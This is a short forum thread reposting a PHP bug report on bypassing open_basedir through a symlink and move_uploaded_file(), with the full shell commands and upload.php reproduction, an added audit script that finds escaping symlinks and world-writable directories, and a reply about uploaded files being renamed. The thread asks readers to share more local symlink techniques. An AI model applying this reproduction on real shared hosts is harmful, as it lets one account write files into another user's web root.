  [Discussion]   local bypass user via symlink 25/02/2008 06:46:09 (+0700) | #1 | 116495
ly0kha
Member

I remember having posted this before, but I can't find it now. Let me post it again; if it is a duplicate, would the mods please delete it.
This is from http://bugs.php.net/bug.php?id=40931

Bug #40931 open_basedir bypass via symlink and move_uploaded_file()
Description:
------------
User can bypass open_basedir restriction by move_uploaded_file() if
target file path is symlink to any directory.

Reproduce code:
---------------
user1 will upload file to user2's /home/user2/public_html folder.

We have in /etc/passwd:
user1:32001:32001::/home/user1:/bin/bash
user2:32002:32002::/home/user2:/bin/bash

Target folder allows to write for anybody:
# ls -lA /home/user2
drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/

Apache has mod_php installed. Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
ServerName user1.xxxxxxx.com
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"
</VirtualHost>

User user1 can do something like:

$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>

<?
if ( isset($_FILES["userfile"]) ) {
    echo "Upload ";
    // destination path goes through the symlink into /home/user2/public_html
    if (move_uploaded_file($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
        echo "ok";
    else echo "failed";
}
?>

<form name="uplform" method="post" action="<?=$PHP_SELF?>"
enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</form>

</body></html>' > upload.php

Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php after file upload
expected message
"Upload failed"
and no file
/home/user2/public_html/file.ext
in target folder.

Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php after file upload we
got message
"Upload ok"
and file
/home/user2/public_html/file.ext
does exist in target folder.
 

Please join in the discussion, or if any of you have experience with local techniques that use symlinks, please share a little.
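Seen from the hosting administrator's side, the report above depends on two conditions: a symlink inside user1's tree that resolves outside /home/user1, and a directory in user2's home that any local user can write to. The shell script below is an added example, not part of the original post or the PHP bug report, that checks for both; the function names and the temp-dir fixture are constructed for illustration, and GNU find and readlink -f are assumed.

```shell
#!/bin/sh
# Added example: audit for the two preconditions in the report above.
# Assumes GNU find and GNU readlink -f; all names here are illustrative.

# Print "link -> target" for each symlink under $2 whose resolved
# target lies outside $1 (the account's open_basedir directory).
symlinks_escaping_basedir() {
    base=$(readlink -f "$1") || return 1
    find "$2" -type l | while IFS= read -r link; do
        target=$(readlink -f "$link") || continue  # unresolvable, e.g. a loop
        case "$target/" in
            "$base"/*) ;;                          # stays inside the base
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Print directories under $1 that any local user may write to (o+w),
# like the drwxrwxrwx public_html in the report.
world_writable_dirs() {
    find "$1" -type d -perm -0002
}

# Constructed fixture: the report's layout rebuilt under a temp dir.
make_fixture() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/home/user1/public_html/img" "$root/home/user2/public_html"
    chmod -R 0755 "$root/home"
    chmod 0777 "$root/home/user2/public_html"
    ln -s "$root/home/user2/public_html" \
          "$root/home/user1/public_html/user2_public_html"
    ln -s img "$root/home/user1/public_html/pics"   # stays inside: not reported
    printf '%s\n' "$root"
}

fixture=$(make_fixture)
symlinks_escaping_basedir "$fixture/home/user1" "$fixture/home/user1/public_html"
world_writable_dirs "$fixture/home"
rm -rf "$fixture"
```

On a real host, the first function takes an account's open_basedir directory and its document root, and the second takes the directory that holds the home directories.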
  [Question]   Re: local bypass user via symlink 23/03/2008 09:03:57 (+0700) | #2 | 120734
zatuzik
Member

Uploading is possible; the only catch is that after uploading, the name of the file is renamed. For example, I upload a file with the name zatuzik.php, and after uploading the name is renamed to 0aef023.